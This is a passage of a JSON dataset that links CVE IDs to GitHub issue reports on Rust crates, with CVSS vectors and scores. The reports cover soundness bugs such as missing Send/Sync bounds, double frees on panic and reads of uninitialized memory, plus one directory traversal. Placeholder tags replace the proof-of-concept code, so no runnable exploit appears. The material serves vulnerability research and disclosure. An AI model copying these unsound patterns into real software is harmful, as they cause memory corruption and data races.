  86016. "description": "Soundness issues with Ptr. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that some soundness issues in the Ptr class NUMBERTAG Ptr implements the Send and Sync traits for all types: URLTAG This allows you to send types that aren't safe to use across threads like Rc and Cell . We'd recommend only implementing this when the APITAG and APITAG NUMBERTAG Ptr violates aliasing rules by having APITAG take a reference and return a mutable reference. URLTAG This allows you to create multiple mutable references to the same object which is undefined behavior in Rust NUMBERTAG APITAG writes to the raw pointer underneath: URLTAG This can lead to data races, using an atomic pointer would be better if you want to support multiple threads. Here's a proof of concept for the two of the issues above: ERRORTAG This outputs: APITAG",
  86017. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86018. "severity": "MEDIUM",
  86019. "baseScore": 5.9,
  86020. "impactScore": 3.6,
  86021. "exploitabilityScore": 2.2
  86022. },
  86023. {
  86024. "CVE_ID": "CVE-2021-29940",
  86025. "Issue_Url_old": "https://github.com/gretchenfrage/through/issues/1",
  86026. "Issue_Url_new": "https://github.com/gretchenfrage/through/issues/1",
  86027. "Repo_new": "gretchenfrage/through",
  86028. "Issue_Created_At": "2021-02-18T16:48:01Z",
  86029. "description": "double free of T upon panic in two functions. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Public functions APITAG and APITAG are not panic safe. Both take a user provided closure as a parameter, and a double drop of T will happen if the user provided closure panics. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of through . APITAG Detail APITAG APITAG ERRORTAG Output: ERRORTAG Tested Environment Crate: through Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  86030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86031. "severity": "CRITICAL",
  86032. "baseScore": 9.8,
  86033. "impactScore": 5.9,
  86034. "exploitabilityScore": 3.9
  86035. },
  86036. {
  86037. "CVE_ID": "CVE-2020-36461",
  86038. "Issue_Url_old": "https://github.com/pipedown/noise/issues/72",
  86039. "Issue_Url_new": "https://github.com/pipedown/noise/issues/72",
  86040. "Repo_new": "pipedown/noise",
  86041. "Issue_Created_At": "2020-12-10T06:28:35Z",
  86042. "description": "Soundness issue in APITAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync for all types: URLTAG However, this should probably have tighter bounds on its Send and Sync traits, otherwise its possible to create data races from safe rust code by using non Sync types like Cell across threads or sending non Send types across like Rc . Here's a little proof of concept using Rc . ERRORTAG This outputs: APITAG It seems like this class also potentially allows for aliasing violations, in this case maybe it would be better to mark the methods as unsafe and maybe not expose the class outside the crate?",
  86043. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86044. "severity": "HIGH",
  86045. "baseScore": 8.1,
  86046. "impactScore": 5.9,
  86047. "exploitabilityScore": 2.2
  86048. },
  86049. {
  86050. "CVE_ID": "CVE-2020-35881",
  86051. "Issue_Url_old": "https://github.com/reem/rust-traitobject/issues/7",
  86052. "Issue_Url_new": "https://github.com/reem/rust-traitobject/issues/7",
  86053. "Repo_new": "reem/rust-traitobject",
  86054. "Issue_Created_At": "2020-06-01T11:44:40Z",
  86055. "description": "Please, release a new version. The implementation of the data and APITAG functions is highly unsafe: URLTAG This assumes that the first element is a fat pointer is the data pointer. This is currently true, but it can change in a newer rust version, which would make this crate a potential security hole. Commit URLTAG fixed this, but it has not been released into a new version. Please, publish a new version NUMBERTAG that includes this commit (and possibly yank the previous versions).",
  86056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86057. "severity": "CRITICAL",
  86058. "baseScore": 9.8,
  86059. "impactScore": 5.9,
  86060. "exploitabilityScore": 3.9
  86061. },
  86062. {
  86063. "CVE_ID": "CVE-2021-30455",
  86064. "Issue_Url_old": "https://github.com/andrewhickman/id-map/issues/3",
  86065. "Issue_Url_new": "https://github.com/andrewhickman/id-map/issues/3",
  86066. "Repo_new": "andrewhickman/id-map",
  86067. "Issue_Created_At": "2021-02-26T05:26:13Z",
  86068. "description": "Multiple panic safety issues. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a few FILETAG issues in this library. clone_from double frees if T::clone panics URLTAG The current values in the map are dropped and the ids are updated up front. This means that if ERRORTAG panics, it can cause the previously dropped values to drop again. get_or_insert double frees if insertion function f panics URLTAG Since this reserves space for the value before calling APITAG , if f panics here, it can drop an already freed value. remove_set double frees if drop panics URLTAG This code goes over to the ids to remove and calls APITAG on them. However if the drop function for the type panics, the element gets dropped again when the APITAG is dropped. Code to recrate these problems is here: ERRORTAG",
  86069. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86070. "severity": "CRITICAL",
  86071. "baseScore": 9.8,
  86072. "impactScore": 5.9,
  86073. "exploitabilityScore": 3.9
  86074. },
  86075. {
  86076. "CVE_ID": "CVE-2019-25005",
  86077. "Issue_Url_old": "https://github.com/RustCrypto/stream-ciphers/issues/64",
  86078. "Issue_Url_new": "https://github.com/rustcrypto/stream-ciphers/issues/64",
  86079. "Repo_new": "rustcrypto/stream-ciphers",
  86080. "Issue_Created_At": "2019-10-22T11:44:30Z",
  86081. "description": "Best place to discuss possible security issues?. Hi! What's the best place to discuss possible security issues regarding the code in this repo?",
  86082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86083. "severity": "HIGH",
  86084. "baseScore": 7.5,
  86085. "impactScore": 3.6,
  86086. "exploitabilityScore": 3.9
  86087. },
  86088. {
  86089. "CVE_ID": "CVE-2020-36440",
  86090. "Issue_Url_old": "https://github.com/mvertescher/libsbc-rs/issues/4",
  86091. "Issue_Url_new": "https://github.com/mvertescher/libsbc-rs/issues/4",
  86092. "Repo_new": "mvertescher/libsbc-rs",
  86093. "Issue_Created_At": "2020-11-10T07:57:54Z",
  86094. "description": "Minor soundness issue with Decoder's Send trait. The Send trait for Decoder should probably be APITAG here: URLTAG otherwise it's possible to send Read instances across threads that might not support it. For example APITAG is a Read but is not Send . However, wrapping it in a Decoder allows it to be sent across threads: CODETAG fails with an assertion error because Send is implemented. APITAG found by APITAG gatech's Rust group)",
  86095. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86096. "severity": "HIGH",
  86097. "baseScore": 8.1,
  86098. "impactScore": 5.9,
  86099. "exploitabilityScore": 2.2
  86100. },
  86101. {
  86102. "CVE_ID": "CVE-2021-45706",
  86103. "Issue_Url_old": "https://github.com/iqlusioninc/crates/issues/876",
  86104. "Issue_Url_new": "https://github.com/iqlusioninc/crates/issues/876",
  86105. "Repo_new": "iqlusioninc/crates",
  86106. "Issue_Created_At": "2021-09-24T15:06:20Z",
  86107. "description": "APITAG no op in zeroize_derive NUMBERTAG for enum s. I discovered a bug where APITAG doesn't generate a Drop implementation when used on enum s. It seems to me that it was accidentally fixed by NUMBERTAG in zeroize_derive version NUMBERTAG The bug still exists in version NUMBERTAG If I'm not missing something and this bug is real, version NUMBERTAG should probably be yanked and a report filed at APITAG Advisory Database. APITAG : APITAG APITAG : CODETAG",
  86108. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86109. "severity": "CRITICAL",
  86110. "baseScore": 9.8,
  86111. "impactScore": 5.9,
  86112. "exploitabilityScore": 3.9
  86113. },
  86114. {
  86115. "CVE_ID": "CVE-2020-35915",
  86116. "Issue_Url_old": "https://github.com/Matthias247/futures-intrusive/issues/53",
  86117. "Issue_Url_new": "https://github.com/matthias247/futures-intrusive/issues/53",
  86118. "Repo_new": "matthias247/futures-intrusive",
  86119. "Issue_Created_At": "2020-10-31T19:17:32Z",
  86120. "description": "APITAG should be marked APITAG I think the APITAG object should me marked explicitly as APITAG , it looks like it was automatically given the Sync trait because it only consists of a APITAG reference which itself is Sync . However, the lock guard object itself shouldn't be usable across threads because it assumes it has the lock acquired. APITAG issue was found by APITAG Here's a demonstration of how this can cause Cell , a non Sync but Sendable type to be used across threads to create a data race: ERRORTAG Output: CODETAG",
  86121. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86122. "severity": "MEDIUM",
  86123. "baseScore": 5.5,
  86124. "impactScore": 3.6,
  86125. "exploitabilityScore": 1.8
  86126. },
  86127. {
  86128. "CVE_ID": "CVE-2021-30454",
  86129. "Issue_Url_old": "https://github.com/SolraBizna/outer_cgi/issues/1",
  86130. "Issue_Url_new": "https://github.com/solrabizna/outer_cgi/issues/1",
  86131. "Repo_new": "solrabizna/outer_cgi",
  86132. "Issue_Created_At": "2021-01-31T15:55:30Z",
  86133. "description": "Read on uninitialized buffer may cause UB. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation NUMBERTAG such occurrences within the same function). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  86134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86135. "severity": "CRITICAL",
  86136. "baseScore": 9.8,
  86137. "impactScore": 5.9,
  86138. "exploitabilityScore": 3.9
  86139. },
  86140. {
  86141. "CVE_ID": "CVE-2019-15549",
  86142. "Issue_Url_old": "https://github.com/KizzyCode/asn1_der/issues/1",
  86143. "Issue_Url_new": "https://github.com/kizzycode/asn1_der-rust/issues/1",
  86144. "Repo_new": "kizzycode/asn1_der-rust",
  86145. "Issue_Created_At": "2019-06-13T01:40:49Z",
  86146. "description": "Unchecked length can cause memory allocation error.. When de serializing bytes, an arbitrary length of the value can be specified. When building APITAG here: URLTAG This can lead to memory crashes for arbitrary large length values. Perhaps an upper bound is required to prevent crashing applications when de serializing arbitrary byte arrays. This can be reproduced in the following example: CODETAG",
  86147. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86148. "severity": "HIGH",
  86149. "baseScore": 7.5,
  86150. "impactScore": 3.6,
  86151. "exploitabilityScore": 3.9
  86152. },
  86153. {
  86154. "CVE_ID": "CVE-2020-36451",
  86155. "Issue_Url_old": "https://github.com/Xudong-Huang/rcu_cell/issues/3",
  86156. "Issue_Url_new": "https://github.com/xudong-huang/rcu_cell/issues/3",
  86157. "Repo_new": "xudong-huang/rcu_cell",
  86158. "Issue_Created_At": "2020-11-15T02:40:08Z",
  86159. "description": "APITAG bound needed on T for APITAG impl of APITAG Hello! :crab:, while scanning APITAG we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue There is no Send bound on T of Send impl of APITAG There is no Sync bound on T of Sync impl of APITAG ERRORTAG By exploiting this issue, it's possible to send non Send items to other threads, or share a non Sync item concurrently across multiple threads. Proof of Concept You need to run the below program in Debug mode in order to observe undefined behavior. In the program below, multiple threads clone & drop Rc (which is neither Send nor Sync). Since Rc 's internal APITAG is updated by multiple threads without synchronization, the program will terminate in either one of the following states. APITAG NUMBERTAG program panics at the assertion check at the end (indicates memory leak in this case) APITAG NUMBERTAG Rc is dropped while references to it are still alive. When run on Ubuntu NUMBERTAG program crashes with error: APITAG APITAG NUMBERTAG Not impossible, but highly unlikely ERRORTAG How to fix Adding trait bounds to APITAG impls of APITAG as below would be one way to fix the issue. ERRORTAG Thank you for reviewing this issue! :crab:",
  86160. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86161. "severity": "HIGH",
  86162. "baseScore": 8.1,
  86163. "impactScore": 5.9,
  86164. "exploitabilityScore": 2.2
  86165. },
  86166. {
  86167. "CVE_ID": "CVE-2020-36214",
  86168. "Issue_Url_old": "https://github.com/abbychau/multiqueue2/issues/10",
  86169. "Issue_Url_new": "https://github.com/abbychau/multiqueue2/issues/10",
  86170. "Repo_new": "abbychau/multiqueue2",
  86171. "Issue_Created_At": "2020-12-19T13:16:47Z",
  86172. "description": "Queues allow non Send types to be sent to other threads, allowing data races. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue T is not bound to Send in the following Send impls, and thus all queue APIs provided by the crate (except for APITAG APITAG ) can send non Send types to other threads. This can allow data race bugs in safe Rust programs. ERRORTAG Proof of Concept I wrote two example programs that can trigger data race bugs while using this crate. Both programs were tested on APITAG , using APITAG in Debug mode. APITAG Program NUMBERTAG APITAG to expand) APITAG This creates a data race to a Cell , causing memory corruption & segmentation fault. APITAG ERRORTAG APITAG APITAG APITAG Program NUMBERTAG APITAG to expand) APITAG This creates a data race to a single Rc , causing either a segmentation fault (illegal instruction) or a memory leak. APITAG ERRORTAG APITAG APITAG Solution One solution for the issue is to add APITAG bounds to the following types' Send impls as below. After making the following changes, the compiler can revoke programs that use the queues to send non Send types to other threads. Please let me know about your opinion on the suggested changes :) ERRORTAG Thank you for reviewing this issue NUMBERTAG",
  86173. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86174. "severity": "MEDIUM",
  86175. "baseScore": 5.9,
  86176. "impactScore": 3.6,
  86177. "exploitabilityScore": 2.2
  86178. },
  86179. {
  86180. "CVE_ID": "CVE-2021-26954",
  86181. "Issue_Url_old": "https://github.com/qwertz19281/rust_utils/issues/3",
  86182. "Issue_Url_new": "https://github.com/qwertz19281/rust_utils/issues/3",
  86183. "Repo_new": "qwertz19281/rust_utils",
  86184. "Issue_Created_At": "2021-02-03T16:01:21Z",
  86185. "description": "Panic safety issue leading to double drop in insert_slice_clone. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , it pushes elements over for insertion using ptr::copy here: URLTAG This can duplicate items in the Vec , after which it calls APITAG , which can potentially panic. This means that during this panic the copied elements can be dropped twice. Here's a quick example of this issue: ERRORTAG This outputs: CODETAG As you can see the first element is being dropped twice. We'd recommend wrapping the vector in APITAG while you're operating on it to prevent this.",
  86186. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  86187. "severity": "MEDIUM",
  86188. "baseScore": 5.3,
  86189. "impactScore": 1.4,
  86190. "exploitabilityScore": 3.9
  86191. },
  86192. {
  86193. "CVE_ID": "CVE-2020-36471",
  86194. "Issue_Url_old": "https://github.com/Xudong-Huang/generator-rs/issues/27",
  86195. "Issue_Url_new": "https://github.com/xudong-huang/generator-rs/issues/27",
  86196. "Repo_new": "xudong-huang/generator-rs",
  86197. "Issue_Created_At": "2020-11-16T18:39:16Z",
  86198. "description": "Generator's Send trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Generator implements Send as long as the closure has a static lifetime. However, this should also probably be bounded by APITAG , otherwise it's possible to smuggle across non Send types across thread boundaries. Here's an example of a data race in safe Rust code through a Generator. ERRORTAG Output: APITAG",
  86199. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86200. "severity": "MEDIUM",
  86201. "baseScore": 5.9,
  86202. "impactScore": 3.6,
  86203. "exploitabilityScore": 2.2
  86204. },
  86205. {
  86206. "CVE_ID": "CVE-2020-35889",
  86207. "Issue_Url_old": "https://github.com/shawnscode/crayon/issues/87",
  86208. "Issue_Url_new": "https://github.com/shawnscode/crayon/issues/87",
  86209. "Repo_new": "shawnscode/crayon",
  86210. "Issue_Created_At": "2020-08-31T21:14:54Z",
  86211. "description": "Misbehaving APITAG implementation can lead to memory safety violation. URLTAG URLTAG URLTAG Description Unsafe code in APITAG has time of check to time of use (TOCTOU) bug that can eventually lead to a memory safety violation. APITAG and APITAG implicitly assumes that APITAG trait methods are pure, i.e., they always return the same value. However, this assumption is unsound since APITAG is a safe, public trait that allows a custom implementation. Demonstration Crate: crayon Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG SIGSEGV)",
  86212. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86213. "severity": "HIGH",
  86214. "baseScore": 8.1,
  86215. "impactScore": 5.9,
  86216. "exploitabilityScore": 2.2
  86217. },
  86218. {
  86219. "CVE_ID": "CVE-2021-26952",
  86220. "Issue_Url_old": "https://github.com/andrewhickman/ms3d/issues/1",
  86221. "Issue_Url_new": "https://github.com/andrewhickman/ms3d/issues/1",
  86222. "Repo_new": "andrewhickman/ms3d",
  86223. "Issue_Created_At": "2021-01-27T03:40:34Z",
  86224. "description": "APITAG : user provided Read on uninitialized buffer may cause UB. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). This method is invokable from APITAG method. FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  86225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86226. "severity": "HIGH",
  86227. "baseScore": 7.5,
  86228. "impactScore": 3.6,
  86229. "exploitabilityScore": 3.9
  86230. },
  86231. {
  86232. "CVE_ID": "CVE-2021-45712",
  86233. "Issue_Url_old": "https://github.com/pyros2097/rust-embed/issues/159",
  86234. "Issue_Url_new": "https://github.com/pyrossh/rust-embed/issues/159",
  86235. "Repo_new": "pyrossh/rust-embed",
  86236. "Issue_Created_At": "2021-11-27T19:16:22Z",
  86237. "description": "Directory traversal attack allowed when running in debug mode. ERRORTAG This code will (assuming you have the correct number of APITAG s), print out the contents of your APITAG .",
  86238. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86239. "severity": "HIGH",
  86240. "baseScore": 7.5,
  86241. "impactScore": 3.6,
  86242. "exploitabilityScore": 3.9
  86243. },
  86244. {
  86245. "CVE_ID": "CVE-2020-35886",
  86246. "Issue_Url_old": "https://github.com/sjep/array/issues/1",
  86247. "Issue_Url_new": "https://github.com/sjep/array/issues/1",
  86248. "Repo_new": "sjep/array",
  86249. "Issue_Created_At": "2020-08-25T23:05:52Z",
  86250. "description": "Multiple security issues including data race, buffer overflow, and uninitialized memory drop. Description arr crate contains multiple security issues. Specifically NUMBERTAG It incorrectly implements APITAG bounds, which allows to smuggle non APITAG types across the thread boundary NUMBERTAG Index and APITAG implementation does not check the array bound NUMBERTAG APITAG drops uninitialized memory. Demonstration Crate: arr Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly NUMBERTAG d NUMBERTAG c5a NUMBERTAG Cargo flags: release ERRORTAG Output: ERRORTAG Return Code NUMBERTAG",
  86251. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86252. "severity": "MEDIUM",
  86253. "baseScore": 4.7,
  86254. "impactScore": 3.6,
  86255. "exploitabilityScore": 1.0
  86256. },
  86257. {
  86258. "CVE_ID": "CVE-2020-36206",
  86259. "Issue_Url_old": "https://github.com/a1ien/rusb/issues/44",
  86260. "Issue_Url_new": "https://github.com/a1ien/rusb/issues/44",
  86261. "Repo_new": "a1ien/rusb",
  86262. "Issue_Created_At": "2020-12-19T01:51:50Z",
  86263. "description": "Unsound APITAG bound for Device and APITAG Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG Device and APITAG implement Send and Sync trait for all T types that implement APITAG . APITAG trait has neither Send nor Sync bound and can be implemented from the user side. This permits writing a custom non thread safe APITAG implementation in safe Rust code, which can cause a data race when used with Device or APITAG . If APITAG is not expected to be implemented by users, making APITAG a sealed trait URLTAG can solve this problem. Otherwise, a proper bound should be added to APITAG implementations of Device and APITAG ( APITAG ) or to the definition of APITAG ( APITAG ).",
  86264. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  86265. "severity": "HIGH",
  86266. "baseScore": 7.0,
  86267. "impactScore": 5.9,
  86268. "exploitabilityScore": 1.0
  86269. },
  86270. {
  86271. "CVE_ID": "CVE-2020-36215",
  86272. "Issue_Url_old": "https://github.com/AdrienChampion/hashconsing/issues/1",
  86273. "Issue_Url_new": "https://github.com/adrienchampion/hashconsing/issues/1",
  86274. "Repo_new": "adrienchampion/hashconsing",
  86275. "Issue_Created_At": "2020-11-10T19:27:49Z",
  86276. "description": "APITAG Send and Sync traits should be bounded on the contained type. Currently, APITAG implements the Send and Sync traits unconditionally: URLTAG This is a possible soundness issue because it allows types T that aren't necessarily thread safe to be used across threads as long as they are wrapped in an APITAG . Sort of a contrived example but the following demonstrates a data race that segfaults safe rust using this: APITAG APITAG to expand example APITAG ERRORTAG APITAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
  86277. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86278. "severity": "HIGH",
  86279. "baseScore": 7.5,
  86280. "impactScore": 3.6,
  86281. "exploitabilityScore": 3.9
  86282. },
  86283. {
  86284. "CVE_ID": "CVE-2020-36462",
  86285. "Issue_Url_old": "https://github.com/Chopinsky/byte_buffer/issues/2",
  86286. "Issue_Url_new": "https://github.com/chopinsky/byte_buffer/issues/2",
  86287. "Repo_new": "chopinsky/byte_buffer",
  86288. "Issue_Created_At": "2020-11-29T22:11:46Z",
  86289. "description": "Send bound needed on T (for Send impl of APITAG ). Hello :crab: , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue Currently Send is implemented for APITAG even when T is not bound by Send . ERRORTAG This makes it possible to use APITAG to send a non Send object to other threads. Proof of Concept Below is an example program that exhibits undefined behavior using the syncpool crate. There is a data race on the internal reference count of Rc , and the program either crashes at runtime (e.g. on Ubuntu: APITAG ) , or panics at the end of the program (indicating a memory leak) . Such behavior can be observed when the program is compiled in Debug mode. ERRORTAG The example is a bit contrived, but it triggers undefined behavior in safe Rust code. How to fix the issue The solution is to add a Send bound on T in the Send impl for APITAG as below. I tested the above example using the modified version of the crate, and the compiler was able to successfully revoke the program. ERRORTAG Thank you for checking out this issue :crab:",
  86290. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86291. "severity": "HIGH",
  86292. "baseScore": 8.1,
  86293. "impactScore": 5.9,
  86294. "exploitabilityScore": 2.2
  86295. },
  86296. {
  86297. "CVE_ID": "CVE-2020-36465",
  86298. "Issue_Url_old": "https://github.com/fizyk20/generic-array/issues/98",
  86299. "Issue_Url_new": "https://github.com/fizyk20/generic-array/issues/98",
  86300. "Repo_new": "fizyk20/generic-array",
  86301. "Issue_Created_At": "2020-04-09T21:34:52Z",
  86302. "description": "APITAG unsoundness. The APITAG macro silently and unsoundly extends arbitrary lifetimes to APITAG ( playground URLTAG : ERRORTAG",
  86303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86304. "severity": "HIGH",
  86305. "baseScore": 7.5,
  86306. "impactScore": 3.6,
  86307. "exploitabilityScore": 3.9
  86308. },
  86309. {
  86310. "CVE_ID": "CVE-2021-38187",
  86311. "Issue_Url_old": "https://github.com/chris-morgan/anymap/issues/37",
  86312. "Issue_Url_new": "https://github.com/chris-morgan/anymap/issues/37",
  86313. "Repo_new": "chris-morgan/anymap",
  86314. "Issue_Created_At": "2019-11-12T22:00:36Z",
  86315. "description": "When is the next crates.io release?. I see a number of commits here, but on crates.io the library is APITAG .",
  86316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86317. "severity": "CRITICAL",
  86318. "baseScore": 9.8,
  86319. "impactScore": 5.9,
  86320. "exploitabilityScore": 3.9
  86321. },
  86322. {
  86323. "CVE_ID": "CVE-2021-26951",
  86324. "Issue_Url_old": "https://github.com/tafia/calamine/issues/199",
  86325. "Issue_Url_new": "https://github.com/tafia/calamine/issues/199",
  86326. "Repo_new": "tafia/calamine",
  86327. "Issue_Created_At": "2021-01-07T03:14:36Z",
  86328. "description": "APITAG accesses unclaimed/uninitialized memory. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. URLTAG Issue NUMBERTAG Write to unclaimed memory. APITAG is done without reserving extra memory for APITAG . After that, new data is written to the unclaimed memory via APITAG . This seems to be a critical security error, as APITAG can potentially write to memory that is actively occupied by another entity. Issue NUMBERTAG APITAG on uninitialized memory can cause undefined behavior APITAG can potentially pass uninitialized memory to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Suggested Fix It would be safe to zero initialize the newly allocated APITAG buffer before APITAG (probably via APITAG ), in order to prevent user provided Read from accessing old contents of the newly allocated heap memory. Thank you for checking out this issue NUMBERTAG",
  86329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86330. "severity": "CRITICAL",
  86331. "baseScore": 9.8,
  86332. "impactScore": 5.9,
  86333. "exploitabilityScore": 3.9
  86334. },
  86335. {
  86336. "CVE_ID": "CVE-2020-35925",
  86337. "Issue_Url_old": "https://github.com/johnshaw/magnetic/issues/9",
  86338. "Issue_Url_new": "https://github.com/johnshaw/magnetic/issues/9",
  86339. "Repo_new": "johnshaw/magnetic",
  86340. "Issue_Created_At": "2020-11-29T14:21:34Z",
  86341. "description": "Send bound needed on T (for APITAG impl of APITAG types). Hello :crab: , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. All queue types (spsc, spmc, mpsc, mpmc) are used to send an object from one thread to another. Currently, APITAG is implemented for producer/consumer types of all queues without a Send bound on T (as below). ERRORTAG This allows users to send non Send objects to other threads, and can potentially let users write safe Rust code that trigger undefined behavior. Here is a proof of concept that invokes undefined behavior using this crate. Due to the data race on the internal reference count of Rc , the program below either crashes at runtime (On Ubuntu, APITAG ) or panics at the end of the program (indicating a memory leak). ERRORTAG In order to prevent this undefined behavior, we need a Send bound on T for both APITAG impls of producer/consumer types. Send bound is needed for impl Sync , due to the fact that it is possible to send objects to other threads by holding a reference to APITAG types. I made a fix that lets the compiler revoke programs like the above, and I'll submit a PR right away. Please let us know what you think about the issue or the fix. Thank you for checking out this issue :crab:",
  86342. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86343. "severity": "MEDIUM",
  86344. "baseScore": 5.5,
  86345. "impactScore": 3.6,
  86346. "exploitabilityScore": 1.8
  86347. },
  86348. {
  86349. "CVE_ID": "CVE-2019-16143",
  86350. "Issue_Url_old": "https://github.com/RustCrypto/MACs/issues/19",
  86351. "Issue_Url_new": "https://github.com/rustcrypto/macs/issues/19",
  86352. "Repo_new": "rustcrypto/macs",
  86353. "Issue_Created_At": "2019-08-25T21:27:52Z",
  86354. "description": "Incorrect digest with hmac blake2s. I seem to be getting incorrect results when using the hmac URLTAG crate with blake2s URLTAG . I have verified that the implementation of the hash functions themselves behave identically. HMAC Blake2s : mismatching output APITAG the empty message with the empty key, using Go APITAG for reference: CODETAG Go Playground URLTAG Outputs APITAG ERRORTAG Outputs APITAG HMAC SHA NUMBERTAG identical output The same behaviour does not occur when instantiating HMAC with SHA NUMBERTAG CODETAG Go Playgound URLTAG Outputs APITAG ERRORTAG Outputs APITAG I have reason to believe the Rust implementation is at fault: the Go code is used in APITAG and successfully performs cryptographic handshakes with other compatible clients.",
  86355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86356. "severity": "CRITICAL",
  86357. "baseScore": 9.8,
  86358. "impactScore": 5.9,
